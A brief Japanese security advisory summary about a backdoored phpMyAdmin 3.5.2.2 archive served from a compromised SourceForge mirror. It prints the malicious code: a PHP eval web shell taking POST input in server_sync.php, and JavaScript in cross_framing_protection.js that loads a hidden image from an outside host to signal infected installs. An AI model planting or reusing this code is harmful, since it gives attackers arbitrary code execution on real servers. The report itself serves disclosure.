このミラーにあるphpMyAdmin-3.5.2.2-all-languages.zipアーカイブにバックドアが導入されました。
次のコードを含むserver_sync.phpファイルがアーカイブに追加されました。
<?php @eval($_POST['c']);?>
任意のコードの実行を許可します。
また、 js / cross_framing_protection.jsファイルが変更され、コードが追加されました。
var icon ; icon = document.createElement("img"); icon.src="http://logos.phpmyadmin-images.net/logo/logos.jpg"; icon.width=0; icon.height=0; document.body.appendChild(icon);
攻撃者は感染したコピーについて知ることができます。
現時点では、侵害されたミラーは回転から除外されています。
SourceForgeのログ記録チームは、このファイルをダウンロードした人が約400人いると判断しました。 ダウンロードしたすべての人に特定できる警告が送信されました。
この脆弱性の悪用はMetasploitパッケージに既に含まれています。
ソース:
韓国語のミラーサーバーでphpMyAdminのコピーが破損している
PMASA-2012-5
侵害されたSourceForgeミラー
phpmyadminバックドアのエクスプロイトを追加